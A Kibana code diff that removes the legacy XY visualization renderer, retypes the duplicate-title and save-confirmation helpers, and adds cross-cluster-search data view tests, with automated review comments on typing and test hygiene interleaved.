colors[seriesLabel] = newColor; - } - - if (props.uiState?.set) { - props.uiState.setSilent('vis.colors', null); - props.uiState.set('vis.colors', colors); - props.uiState.emit('colorChanged'); - } - }, - [props.uiState] - ); - - const { visData, visParams, syncColors, syncTooltips } = props; - const isDarkMode = getThemeService().useDarkMode(); - - const config = getConfig(visData, visParams, props.useLegacyTimeAxis, isDarkMode); - const timeZone = getTimeZone(); - const xDomain = - config.xAxis.scale.type === ScaleType.Ordinal ? 
undefined : getXDomain(config.aspects.x.params); - const hasBars = visParams.seriesParams.some( - ({ type, data: { id: paramId } }) => - type === ChartType.Histogram && - config.aspects.y.find(({ aggId }) => aggId === paramId) !== undefined - ); - const adjustedXDomain = - config.xAxis.scale.type === ScaleType.Ordinal - ? undefined - : getAdjustedDomain(visData.rows, config.aspects.x, timeZone, xDomain, hasBars); - const legendPosition = useMemo( - () => config.legend.position ?? Position.Right, - [config.legend.position] - ); - - const getSeriesName = getSeriesNameFn(config.aspects, config.aspects.y.length > 1); - - const splitAccessors = config.aspects.series?.map(({ accessor, formatter }) => { - return { accessor, formatter }; - }); - - const allSeries = useMemo( - () => getAllSeries(visData.rows, splitAccessors, config.aspects.y), - [config.aspects.y, splitAccessors, visData.rows] - ); - - const getSeriesColor = useCallback( - (series: XYChartSeriesIdentifier) => { - const seriesName = getSeriesName(series) as string; - if (!seriesName) { - return null; - } - const overwriteColors: Record = props.uiState?.get - ? props.uiState.get('vis.colors', {}) - : {}; - - if (Object.keys(overwriteColors).includes(seriesName)) { - return overwriteColors[seriesName]; - } - const outputColor = palettesRegistry?.get(visParams.palette.name).getCategoricalColor( - [ - { - name: seriesName, - rankAtDepth: splitAccessors - ? allSeries.findIndex((name) => name === seriesName) - : config.aspects.y.findIndex((aspect) => aspect.accessor === series.yAccessor), - totalSeriesAtDepth: splitAccessors ? allSeries.length : config.aspects.y.length, - }, - ], - { - maxDepth: 1, - totalSeries: splitAccessors ? 
allSeries.length : config.aspects.y.length, - behindText: false, - syncColors, - } - ); - return outputColor || null; - }, - [ - allSeries, - config.aspects.y, - getSeriesName, - props.uiState, - splitAccessors, - syncColors, - visParams.palette.name, - palettesRegistry, - ] - ); - const xAccessor = getXAccessor(config.aspects.x); - - const splitSeriesAccessors = useMemo( - () => - config.aspects.series - ? compact(config.aspects.series.map(getComplexAccessor(COMPLEX_SPLIT_ACCESSOR))) - : [], - [config.aspects.series] - ); - const splitChartColumnAccessor = config.aspects.splitColumn - ? getComplexAccessor(COMPLEX_SPLIT_ACCESSOR, true)(config.aspects.splitColumn) - : undefined; - const splitChartRowAccessor = config.aspects.splitRow - ? getComplexAccessor(COMPLEX_SPLIT_ACCESSOR, true)(config.aspects.splitRow) - : undefined; - - const renderSeries = useMemo( - () => - renderAllSeries( - config, - visParams.seriesParams, - visData.rows, - getSeriesName, - getSeriesColor, - timeZone, - xAccessor, - splitSeriesAccessors - ), - [ - config, - getSeriesColor, - getSeriesName, - splitSeriesAccessors, - timeZone, - visData.rows, - visParams.seriesParams, - xAccessor, - ] - ); - - const legendColorPicker = useMemo( - () => - getColorPicker( - legendPosition, - setColor, - getSeriesName, - visParams.palette.name, - props.uiState - ), - [getSeriesName, legendPosition, props.uiState, setColor, visParams.palette.name] - ); - - return ( -
- - - - 0 - ? getLegendActions( - canFilter, - getFilterEventData(visData, xAccessor, splitSeriesAccessors), - handleFilterAction, - getSeriesName - ) - : undefined - } - /> - - - - - {config.yAxes.map((axisProps) => ( - - ))} - {renderSeries} - -
- ); -}; - -// eslint-disable-next-line import/no-default-export -export default memo(VisComponent); diff --git a/src/plugins/vis_types/xy/public/vis_renderer.tsx b/src/plugins/vis_types/xy/public/vis_renderer.tsx deleted file mode 100644 index 246f85ee60089..0000000000000 --- a/src/plugins/vis_types/xy/public/vis_renderer.tsx +++ /dev/null 
@@ -1,108 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { lazy } from 'react'; -import { render, unmountComponentAtNode } from 'react-dom'; -import { I18nProvider } from '@kbn/i18n-react'; -import { KibanaExecutionContext } from '@kbn/core-execution-context-common'; - -import { METRIC_TYPE } from '@kbn/analytics'; -import { KibanaThemeProvider } from '@kbn/kibana-react-plugin/public'; -import { VisualizationContainer } from '@kbn/visualizations-plugin/public'; -import type { PersistedState } from '@kbn/visualizations-plugin/public'; -import type { ExpressionRenderDefinition } from '@kbn/expressions-plugin/public'; - -import { LEGACY_TIME_AXIS } from '@kbn/charts-plugin/common'; -import { StartServicesGetter } from '@kbn/kibana-utils-plugin/public'; -import type { XyVisType } from '../common'; -import type { VisComponentType } from './vis_component'; -import { RenderValue, visName } from './expression_functions/xy_vis_fn'; -import { VisTypeXyPluginStartDependencies } from './plugin'; - -// @ts-ignore -const VisComponent = lazy(() => import('./vis_component')); - -function shouldShowNoResultsMessage(visData: any, visType: XyVisType): boolean { - const rows: object[] | undefined = visData?.rows; - const isZeroHits = visData?.hits === 0 || (rows && !rows.length); - - return Boolean(isZeroHits); -} - -/** @internal **/ -const extractContainerType = (context?: KibanaExecutionContext): string | undefined => { - if (context) { - const recursiveGet = (item: KibanaExecutionContext): KibanaExecutionContext | undefined => { - if (item.type) { - return item; - } else if (item.child) { - return recursiveGet(item.child); - } - }; - return 
recursiveGet(context)?.type; - } -}; - -export const getXYVisRenderer: (deps: { - getStartDeps: StartServicesGetter; -}) => ExpressionRenderDefinition = ({ getStartDeps }) => ({ - name: visName, - displayName: 'XY visualization', - reuseDomNode: true, - render: async (domNode, { visData, visConfig, visType, syncColors, syncTooltips }, handlers) => { - const { core, plugins } = getStartDeps(); - const showNoResult = shouldShowNoResultsMessage(visData, visType); - - const renderComplete = () => { - // Renaming according to business requirements - const visTypeTelemetryMap: Record = { - histogram: 'vertical_bar', - }; - const containerType = extractContainerType(handlers.getExecutionContext()); - const visualizationType = 'agg_based'; - - if (plugins.usageCollection && containerType) { - const hasMixedXY = new Set(visConfig.seriesParams.map((item) => item.type)); - const counterEvents = [ - `render_${visualizationType}_${visTypeTelemetryMap[visType] ?? visType}`, - hasMixedXY.size > 1 ? `render_${visualizationType}_mixed_xy` : undefined, - ].filter(Boolean) as string[]; - - plugins.usageCollection.reportUiCounter(containerType, METRIC_TYPE.COUNT, counterEvents); - } - - handlers.done(); - }; - - handlers.onDestroy(() => unmountComponentAtNode(domNode)); - - render( - - - - - - - , - domNode - ); - }, -}); diff --git a/src/plugins/vis_types/xy/tsconfig.json b/src/plugins/vis_types/xy/tsconfig.json index ab3f3d1252ed8..7cc6e60099cbf 100644 --- a/src/plugins/vis_types/xy/tsconfig.json +++ b/src/plugins/vis_types/xy/tsconfig.json @@ -15,10 +15,7 @@ "references": [ { "path": "../../../core/tsconfig.json" }, { "path": "../../charts/tsconfig.json" }, - { "path": "../../data/tsconfig.json" }, - { "path": "../../expressions/tsconfig.json" }, { "path": "../../visualizations/tsconfig.json" }, - { "path": "../../usage_collection/tsconfig.json" }, { "path": "../../kibana_utils/tsconfig.json" }, { "path": "../../vis_default_editor/tsconfig.json" }, ] 
diff --git a/src/plugins/visualizations/public/embeddable/visualize_embeddable_factory.tsx b/src/plugins/visualizations/public/embeddable/visualize_embeddable_factory.tsx
index 05e7ea218325b..4dcaa582511c3 100644
--- a/src/plugins/visualizations/public/embeddable/visualize_embeddable_factory.tsx
+++ b/src/plugins/visualizations/public/embeddable/visualize_embeddable_factory.tsx
@@ -25,8 +25,8 @@ import {
   IContainer,
   AttributeService,
 } from '@kbn/embeddable-plugin/public';
-import { checkForDuplicateTitle } from '@kbn/saved-objects-plugin/public';
 import type { StartServicesGetter } from '@kbn/kibana-utils-plugin/public';
+import { checkForDuplicateTitle } from '../utils/saved_objects_utils/check_for_duplicate_title';
 import type { DisabledLabEmbeddable } from './disabled_lab_embeddable';
 import type {
   VisualizeByReferenceInput,
@@ -271,17 +271,18 @@ export class VisualizeEmbeddableFactory
     }
   }
 
-  public async checkTitle(props: OnSaveProps): Promise {
+  public async checkTitle(props: OnSaveProps): Promise {
     const savedObjectsClient = await this.deps.start().core.savedObjects.client;
     const overlays = await this.deps.start().core.overlays;
+
     return checkForDuplicateTitle(
       {
         title: props.newTitle,
-        copyOnSave: false,
         lastSavedTitle: '',
         getEsType: () => this.type,
         getDisplayName: this.getDisplayName || (() => this.type),
       },
+      false,
       props.isTitleDuplicateConfirmed,
       props.onTitleDuplicate,
       {
diff --git a/src/plugins/visualizations/public/legacy/vis_update_state.js b/src/plugins/visualizations/public/legacy/vis_update_state.js
index db6a9f2beb776..00853a2af8c6e 100644
--- a/src/plugins/visualizations/public/legacy/vis_update_state.js
+++ b/src/plugins/visualizations/public/legacy/vis_update_state.js
@@ -6,7 +6,7 @@
  * Side Public License, v 1.
  */
 
-import { set } from '@elastic/safer-lodash-set';
+import { set } from '@kbn/safer-lodash-set';
 import _ from 'lodash';
 
 /**
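Review bot: The new positional `false` passed to checkForDuplicateTitle in checkTitle gives the reader no hint that it is the `copyOnSave` flag, and it sits directly before `props.isTitleDuplicateConfirmed`, another boolean, so the two are easy to transpose at a glance. Naming it, `const copyOnSave = false;` and passing `copyOnSave`, keeps the intent visible without changing behaviour. The return type of the changed signature prints as a bare `Promise` here, which looks like a generic argument lost in rendering rather than a real omission. checkTitle's body continues past the end of the hunk.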
diff --git a/src/plugins/visualizations/public/persisted_state/persisted_state.ts b/src/plugins/visualizations/public/persisted_state/persisted_state.ts index dcc86228031fa..74b23081c4ace 100644 --- a/src/plugins/visualizations/public/persisted_state/persisted_state.ts +++ b/src/plugins/visualizations/public/persisted_state/persisted_state.ts @@ -8,7 +8,7 @@ import { EventEmitter } from 'events'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { isPlainObject, cloneDeep, get, isEqual, isString, merge, mergeWith, toPath } from 'lodash'; function prepSetParams(key: PersistedStateKey, value: any, path: PersistedStatePath) { diff --git a/src/plugins/visualizations/public/types.ts b/src/plugins/visualizations/public/types.ts index 8c09258f83546..c69f7894fa326 100644 --- a/src/plugins/visualizations/public/types.ts +++ b/src/plugins/visualizations/public/types.ts @@ -48,7 +48,7 @@ export interface ISavedVis { export interface VisSavedObject extends ISavedVis { lastSavedTitle: string; getEsType: () => string; - getDisplayName?: () => string; + getDisplayName: () => string; displayName: string; migrationVersion?: SavedObjectsMigrationVersion; searchSource?: ISearchSource; diff --git a/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts b/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts index 3dc876a7e32e7..e4a006212d767 100644 --- a/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts +++ b/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts 
@@ -7,13 +7,13 @@
  */
 
 import type { OverlayStart, SavedObjectsClientContract } from '@kbn/core/public';
-import type { SavedObject } from '@kbn/saved-objects-plugin/public';
+import type { VisSavedObject } from '../../types';
 import { SAVE_DUPLICATE_REJECTED } from './constants';
 import { findObjectByTitle } from './find_object_by_title';
 import { displayDuplicateTitleConfirmModal } from './display_duplicate_title_confirm_modal';
 
 /**
- * check for an existing SavedObject with the same title in ES
+ * check for an existing VisSavedObject with the same title in ES
  * returns Promise when it's no duplicate, or the modal displaying the warning
  * that's there's a duplicate is confirmed, else it returns a rejected Promise
  * @param savedObject
@@ -23,16 +23,17 @@ import { displayDuplicateTitleConfirmModal } from './display_duplicate_title_con
  */
 export async function checkForDuplicateTitle(
   savedObject: Pick<
-    SavedObject,
-    'id' | 'title' | 'getDisplayName' | 'lastSavedTitle' | 'copyOnSave' | 'getEsType'
+    VisSavedObject,
+    'id' | 'title' | 'lastSavedTitle' | 'getDisplayName' | 'getEsType'
   >,
+  copyOnSave: boolean,
   isTitleDuplicateConfirmed: boolean,
   onTitleDuplicate: (() => void) | undefined,
   services: {
     savedObjectsClient: SavedObjectsClientContract;
     overlays: OverlayStart;
   }
-): Promise {
+): Promise {
   const { savedObjectsClient, overlays } = services;
   // Don't check for duplicates if user has already confirmed save with duplicate title
   if (isTitleDuplicateConfirmed) {
@@ -41,7 +42,7 @@ export async function checkForDuplicateTitle(
 
   // Don't check if the user isn't updating the title, otherwise that would become very annoying to have
   // to confirm the save every time, except when copyOnSave is true, then we do want to check.
-  if (savedObject.title === savedObject.lastSavedTitle && !savedObject.copyOnSave) {
+  if (savedObject.title === savedObject.lastSavedTitle && !copyOnSave) {
     return true;
   }
 
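Review bot: The inserted `copyOnSave: boolean` parameter lands immediately before `isTitleDuplicateConfirmed: boolean`, so every call site now passes two adjacent unlabeled booleans (`savedObject, false, isTitleDuplicateConfirmed, …`) and a swapped pair would still type-check. The TSDoc above the signature was touched in this hunk but still lists only `@param savedObject`; add `@param copyOnSave - when true the title is checked even if it has not changed`, which is what the comment near the bottom of the hunk already states. If the signature is going to change anyway, folding the two flags into an options object would be the idiomatic fix; otherwise the doc line alone is enough. The function body continues beyond the last hunk.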
diff --git a/src/plugins/visualizations/public/utils/saved_objects_utils/confirm_modal_promise.tsx b/src/plugins/visualizations/public/utils/saved_objects_utils/confirm_modal_promise.tsx index 66395d4b3722e..4e8bc7b9e7228 100644 --- a/src/plugins/visualizations/public/utils/saved_objects_utils/confirm_modal_promise.tsx +++ b/src/plugins/visualizations/public/utils/saved_objects_utils/confirm_modal_promise.tsx @@ -17,7 +17,7 @@ export function confirmModalPromise( title = '', confirmBtnText = '', overlays: OverlayStart -): Promise { +): Promise { return new Promise((resolve, reject) => { const cancelButtonText = i18n.translate('visualizations.confirmModal.cancelButtonLabel', { defaultMessage: 'Cancel', diff --git a/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts b/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts index 9291b2a29e0a0..4ce7f2ec33e40 100644 --- a/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts +++ b/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts @@ -8,14 +8,14 @@ import { i18n } from '@kbn/i18n'; import type { OverlayStart } from '@kbn/core/public'; -import type { SavedObject } from '@kbn/saved-objects-plugin/public'; +import type { VisSavedObject } from '../../types'; import { SAVE_DUPLICATE_REJECTED } from './constants'; import { confirmModalPromise } from './confirm_modal_promise'; export function displayDuplicateTitleConfirmModal( - savedObject: Pick, + savedObject: Pick, overlays: OverlayStart -): Promise { +): Promise { const confirmMessage = i18n.translate( 'visualizations.confirmModal.saveDuplicateConfirmationMessage', { 
diff --git a/src/plugins/visualizations/public/utils/saved_objects_utils/find_object_by_title.test.ts b/src/plugins/visualizations/public/utils/saved_objects_utils/find_object_by_title.test.ts index 8c8bda93ce13e..91ccf9262df95 100644 --- a/src/plugins/visualizations/public/utils/saved_objects_utils/find_object_by_title.test.ts +++ b/src/plugins/visualizations/public/utils/saved_objects_utils/find_object_by_title.test.ts @@ -7,7 +7,7 @@ */ import { findObjectByTitle } from './find_object_by_title'; -import { SavedObjectsClientContract, SavedObject } from '@kbn/core/public'; +import { SavedObjectsClientContract, SimpleSavedObject } from '@kbn/core/public'; import { simpleSavedObjectMock } from '@kbn/core/public/mocks'; describe('findObjectByTitle', () => { @@ -25,7 +25,8 @@ describe('findObjectByTitle', () => { it('matches any case', async () => { const indexPattern = simpleSavedObjectMock.create(savedObjectsClient, { attributes: { title: 'foo' }, - } as SavedObject); + } as SimpleSavedObject); + savedObjectsClient.find = jest.fn().mockImplementation(() => Promise.resolve({ savedObjects: [indexPattern], diff --git a/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.test.ts b/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.test.ts index fc5581eb3ed05..05512a421c28d 100644 --- a/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.test.ts +++ b/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.test.ts @@ -13,6 +13,7 @@ import type { } from '@kbn/core/public'; import type { SavedObjectsClientContract } from '@kbn/core/public'; import { saveWithConfirmation } from './save_with_confirmation'; +import { VisSavedObject } from '../../types'; import * as deps from './confirm_modal_promise'; import { OVERWRITE_REJECTED } from './constants'; 
@@ -25,7 +26,7 @@ describe('saveWithConfirmation', () => { getEsType: () => 'test type', title: 'test title', displayName: 'test display name', - }; + } as VisSavedObject; beforeEach(() => { savedObjectsClient.create = jest.fn(); diff --git a/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.ts b/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.ts index a33fbd18f1b4f..ea46095d589bf 100644 --- a/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.ts +++ b/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.ts 
@@ -16,27 +16,24 @@ import type { } from '@kbn/core/public'; import { OVERWRITE_REJECTED } from './constants'; import { confirmModalPromise } from './confirm_modal_promise'; +import type { VisSavedObject } from '../../types'; /** * Attempts to create the current object using the serialized source. If an object already * exists, a warning message requests an overwrite confirmation. * @param source - serialized version of this object what will be indexed into elasticsearch. - * @param savedObject - a simple object that contains properties title and displayName, and getEsType method + * @param savedObject - VisSavedObject * @param options - options to pass to the saved object create method * @param services - provides Kibana services savedObjectsClient and overlays * @returns {Promise} - A promise that is resolved with the objects id if the object is * successfully indexed. If the overwrite confirmation was rejected, an error is thrown with * a confirmRejected = true parameter so that case can be handled differently than * a create or index error. - * @resolved {SavedObject} + * @resolved {SimpleSavedObject} */ export async function saveWithConfirmation( source: SavedObjectAttributes, - savedObject: { - getEsType(): string; - title: string; - displayName: string; - }, + savedObject: VisSavedObject, options: SavedObjectsCreateOptions, services: { savedObjectsClient: SavedObjectsClientContract; overlays: OverlayStart } ) { diff --git a/src/plugins/visualizations/public/utils/saved_visualize_utils.ts b/src/plugins/visualizations/public/utils/saved_visualize_utils.ts index df7565827dd9f..2238ff7cf054a 100644 --- a/src/plugins/visualizations/public/utils/saved_visualize_utils.ts +++ b/src/plugins/visualizations/public/utils/saved_visualize_utils.ts 
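Review bot: `saveWithConfirmation` now requires a full `VisSavedObject` although the removed inline type shows it only reads `getEsType`, `title` and `displayName`; the test updated in the same commit (save_with_confirmation.test.ts) has to add `as VisSavedObject` to push a partial mock past the checker, which is the cast-to-silence pattern. `Pick<VisSavedObject, 'getEsType' | 'title' | 'displayName'>` would keep the narrow contract and match the `Pick<VisSavedObject, …>` style checkForDuplicateTitle adopts in this commit. The rewritten `@param savedObject - VisSavedObject` only restates the type; say which fields are read instead. The function body continues past the end of the hunk.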
@@ -370,10 +370,8 @@ export async function saveVisualization( try { await checkForDuplicateTitle( - { - ...savedObject, - copyOnSave, - } as any, + savedObject, + copyOnSave, isTitleDuplicateConfirmed, onTitleDuplicate, services as any diff --git a/src/plugins/visualizations/public/visualize_app/components/visualize_listing.tsx b/src/plugins/visualizations/public/visualize_app/components/visualize_listing.tsx index 59017aa643cc7..d3c2c75bca853 100644 --- a/src/plugins/visualizations/public/visualize_app/components/visualize_listing.tsx +++ b/src/plugins/visualizations/public/visualize_app/components/visualize_listing.tsx @@ -34,6 +34,7 @@ import { getTableColumns, getNoItemsMessage } from '../utils'; export const VisualizeListing = () => { const { services: { + core, application, executionContext, chrome, @@ -108,8 +109,8 @@ export const VisualizeListing = () => { const noItemsFragment = useMemo(() => getNoItemsMessage(createNewVis), [createNewVis]); const tableColumns = useMemo( - () => getTableColumns(application, kbnUrlStateStorage, savedObjectsTagging), - [application, kbnUrlStateStorage, savedObjectsTagging] + () => getTableColumns(core, kbnUrlStateStorage, savedObjectsTagging), + [core, kbnUrlStateStorage, savedObjectsTagging] ); const fetchItems = useCallback( diff --git a/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx b/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx index 03cb64920879e..adb9e3d9ef3e9 100644 --- a/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx +++ b/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx 
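Review bot: The `as any` on the savedObject argument is gone, but `services as any` on the following line still disables checking for the other parameter of the now precisely-typed checkForDuplicateTitle, so a missing `savedObjectsClient` or `overlays` would surface at runtime rather than compile time. If `services` already has those two members the cast can simply be dropped; if it is a wider object, pass `{ savedObjectsClient: services.savedObjectsClient, overlays: services.overlays }` so the requirement is explicit. saveVisualization starts and ends outside the hunk, so I cannot confirm the shape of `services` from here.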
@@ -18,10 +18,10 @@ import { } from '@elastic/eui'; import { i18n } from '@kbn/i18n'; import { FormattedMessage } from '@kbn/i18n-react'; -import { ApplicationStart } from '@kbn/core/public'; import { IKbnUrlStateStorage } from '@kbn/kibana-utils-plugin/public'; import type { SavedObjectsTaggingApi } from '@kbn/saved-objects-tagging-oss-plugin/public'; -import { RedirectAppLinks } from '@kbn/kibana-react-plugin/public'; +import { RedirectAppLinks } from '@kbn/shared-ux-link-redirect-app'; +import type { CoreStart } from '@kbn/core/public'; import { VisualizationListItem } from '../..'; import { getVisualizeListItemLink } from './get_visualize_list_item_link'; @@ -80,7 +80,7 @@ const renderItemTypeIcon = (item: VisualizationListItem) => { }; export const getTableColumns = ( - application: ApplicationStart, + core: CoreStart, kbnUrlStateStorage: IKbnUrlStateStorage, taggingApi?: SavedObjectsTaggingApi ) => @@ -91,12 +91,17 @@ export const getTableColumns = ( defaultMessage: 'Title', }), sortable: true, - render: (field: string, { editApp, editUrl, title, error, type }: VisualizationListItem) => + render: (field: string, { editApp, editUrl, title, error }: VisualizationListItem) => // In case an error occurs i.e. the vis has wrong type, we render the vis but without the link !error ? ( - + {field} diff --git a/test/accessibility/apps/discover.ts b/test/accessibility/apps/discover.ts index da42d38cf835b..afb75a670881d 100644 --- a/test/accessibility/apps/discover.ts +++ b/test/accessibility/apps/discover.ts @@ -155,8 +155,7 @@ export default function ({ getService, getPageObjects }: FtrProviderContext) { await testSubjects.click('discoverChartOptionsToggle'); }); - // https://github.com/elastic/eui/issues/5900 - it.skip('a11y test for data grid sort panel', async () => { + it('a11y test for data grid sort panel', async () => { await testSubjects.click('dataGridColumnSortingButton'); await a11y.testAppSnapshot(); await browser.pressKeys(browser.keys.ESCAPE); 
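Review bot: `getTableColumns` now takes the whole `CoreStart` where it previously declared only `ApplicationStart`, and the only consumer visible in the hunk is the `RedirectAppLinks` element (its props appear stripped in this rendering, so I cannot see what it reads). If that component needs only a subset, declaring the parameter as `Pick<CoreStart, 'application'>` or the exact subset it consumes keeps the function's dependency explicit and spares visualize_listing.tsx from threading the entire core object through its `useMemo` dependency list. The `type` field removed from the destructuring is presumably unused after the change; the stripped JSX prevents confirming that here.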
diff --git a/test/api_integration/apis/telemetry/utils/schema_to_config_schema.ts b/test/api_integration/apis/telemetry/utils/schema_to_config_schema.ts index deb6218e145af..b80a42e101284 100644 --- a/test/api_integration/apis/telemetry/utils/schema_to_config_schema.ts +++ b/test/api_integration/apis/telemetry/utils/schema_to_config_schema.ts @@ -8,7 +8,7 @@ import type { ObjectType, Type } from '@kbn/config-schema'; import { schema } from '@kbn/config-schema'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get, merge } from 'lodash'; import type { AllowedSchemaTypes } from '@kbn/usage-collection-plugin/server'; diff --git a/test/functional/apps/management/ccs_compatibility/_data_views_ccs.ts b/test/functional/apps/management/ccs_compatibility/_data_views_ccs.ts new file mode 100644 index 0000000000000..d2ab2b64bf738 --- /dev/null +++ b/test/functional/apps/management/ccs_compatibility/_data_views_ccs.ts 
@@ -0,0 +1,95 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import expect from '@kbn/expect'; +import { FtrProviderContext } from '../../../ftr_provider_context'; + +export default function ({ getService, getPageObjects }: FtrProviderContext) { + const kibanaServer = getService('kibanaServer'); + const testSubjects = getService('testSubjects'); + const es = getService('es'); + const PageObjects = getPageObjects(['settings', 'common', 'header']); + const security = getService('security'); + + describe('data views ccs', function () { + before(async function () { + await security.testUser.setRoles(['kibana_admin']); + }); + + describe('index pattern wizard ccs', () => { + describe('remote cluster only', async () => { + beforeEach(async function () { + await kibanaServer.uiSettings.replace({}); + await PageObjects.settings.navigateTo(); + await PageObjects.settings.clickKibanaIndexPatterns(); + }); + it('create index pattern using remote name', async () => { + await PageObjects.settings.createIndexPattern('ftr-remote:logstash*', null); + await PageObjects.settings.clickKibanaIndexPatterns(); + const indexPatternList = await PageObjects.settings.getIndexPatternList(); + expect(indexPatternList.length).to.eql(1); + }); + it('create index pattern with wildcards in remote name', async () => { + await PageObjects.settings.createIndexPattern('*t*-remo*:log*', null); + await PageObjects.settings.clickKibanaIndexPatterns(); + const indexPatternList = await PageObjects.settings.getIndexPatternList(); + expect(indexPatternList.length).to.eql(1); + }); + + afterEach(async () => { + await PageObjects.header.waitUntilLoadingHasFinished(); + await 
testSubjects.exists('indexPatternTable'); + await kibanaServer.savedObjects.cleanStandardList(); + }); + }); + describe('remote and local clusters', async () => { + before(async () => { + await es.transport.request({ + path: '/blogs/_doc', + method: 'POST', + body: { user: 'cuffs', message: 20 }, + }); + }); + + beforeEach(async function () { + // delete .kibana index and then wait for Kibana to re-create it + await kibanaServer.uiSettings.replace({}); + await PageObjects.settings.navigateTo(); + await PageObjects.settings.clickKibanaIndexPatterns(); + }); + it('combined remote cluster and local cluster data view without wildcards', async () => { + await PageObjects.settings.createIndexPattern('blog*, ftr-remote:log*', null); + await PageObjects.settings.clickKibanaIndexPatterns(); + const indexPatternList = await PageObjects.settings.getIndexPatternList(); + expect(indexPatternList.length).to.eql(1); + }); + it('combined remote cluster and local cluster data view with wildcards', async () => { + await PageObjects.settings.createIndexPattern('blog*, *t*-remo*:lo*', null); + await PageObjects.settings.clickKibanaIndexPatterns(); + const indexPatternList = await PageObjects.settings.getIndexPatternList(); + expect(indexPatternList.length).to.eql(1); + }); + + afterEach(async () => { + await PageObjects.header.waitUntilLoadingHasFinished(); + await testSubjects.exists('indexPatternTable'); + await kibanaServer.savedObjects.cleanStandardList(); + }); + after(async () => { + await es.transport.request({ + path: '/blogs', + method: 'DELETE', + }); + }); + }); + after(async () => { + await security.testUser.restoreDefaults(); + }); + }); + }); +} diff --git a/test/functional/apps/management/ccs_compatibility/index.ts b/test/functional/apps/management/ccs_compatibility/index.ts new file mode 100644 index 0000000000000..14c0c90e7b951 --- /dev/null +++ b/test/functional/apps/management/ccs_compatibility/index.ts 
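Review bot: Both inner suites, `describe('remote cluster only', async () => {` and `describe('remote and local clusters', async () => {`, declare the suite callback `async`; mocha invokes describe callbacks synchronously and ignores a returned promise, and neither body awaits at that level, so the `async` is misleading and should be dropped. The comment `// delete .kibana index and then wait for Kibana to re-create it` does not describe the `kibanaServer.uiSettings.replace({})` call beneath it; `// reset UI settings before each case` would match the code. In both `afterEach` hooks `await testSubjects.exists('indexPatternTable');` discards its boolean result, so it neither waits for nor verifies the table; use `await testSubjects.existOrFail('indexPatternTable');` if the intent is to assert, or remove the line if it is only a pause.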
@@ -0,0 +1,30 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0 and the Server Side Public License, v 1; you may not use this file except
+ * in compliance with, at your election, the Elastic License 2.0 or the Server
+ * Side Public License, v 1.
+ */
+
+import { FtrProviderContext } from '../../../ftr_provider_context';
+
+export default function ({ getService, loadTestFile }: FtrProviderContext) {
+  const remoteEsArchiver = getService('remoteEsArchiver' as 'esArchiver');
+  const esArchiver = getService('esArchiver');
+
+  describe('management', function () {
+    before(async () => {
+      await remoteEsArchiver.loadIfNeeded(
+        'test/functional/fixtures/es_archiver/logstash_functional'
+      );
+      await esArchiver.loadIfNeeded('test/functional/fixtures/es_archiver/makelogs');
+    });
+
+    after(async () => {
+      await remoteEsArchiver.unload('test/functional/fixtures/es_archiver/logstash_functional');
+      await esArchiver.unload('test/functional/fixtures/es_archiver/makelogs');
+    });
+
+    loadTestFile(require.resolve('./_data_views_ccs'));
+  });
+}
diff --git a/test/functional/config.ccs.ts b/test/functional/config.ccs.ts
index 6e3f92ac37b8e..c5c303cdf22c5 100644
--- a/test/functional/config.ccs.ts
+++ b/test/functional/config.ccs.ts
@@ -21,6 +21,7 @@ export default async function ({ readConfigFile }: FtrConfigProviderContext) {
       require.resolve('./apps/dashboard/group3'),
       require.resolve('./apps/discover/ccs_compatibility'),
       require.resolve('./apps/console/_console_ccs'),
+      require.resolve('./apps/management/ccs_compatibility'),
     ],
 
     services: {
diff --git a/test/functional/page_objects/discover_page.ts b/test/functional/page_objects/discover_page.ts
index 8700cc734d809..ab453fc2378ed 100644
--- a/test/functional/page_objects/discover_page.ts
+++ b/test/functional/page_objects/discover_page.ts
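Review bot: `getService('remoteEsArchiver' as 'esArchiver')` asserts one string literal to another to satisfy the typed service map, which hides that `remoteEsArchiver` is not declared there and types the result as the local archiver. Registering the remote archiver in the FTR service types (the `services: {` block in the config.ccs.ts hunk below is presumably where it is wired) would let the cast go away; if it has to stay for now, a comment such as `// remoteEsArchiver exposes the esArchiver API but is not in the typed service map yet` tells the next reader why the literal is being lied about.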
@@ -505,6 +505,15 @@ export class DiscoverPageObject extends FtrService {
     await this.header.waitUntilLoadingHasFinished();
   }
 
+  public async getIndexPatterns() {
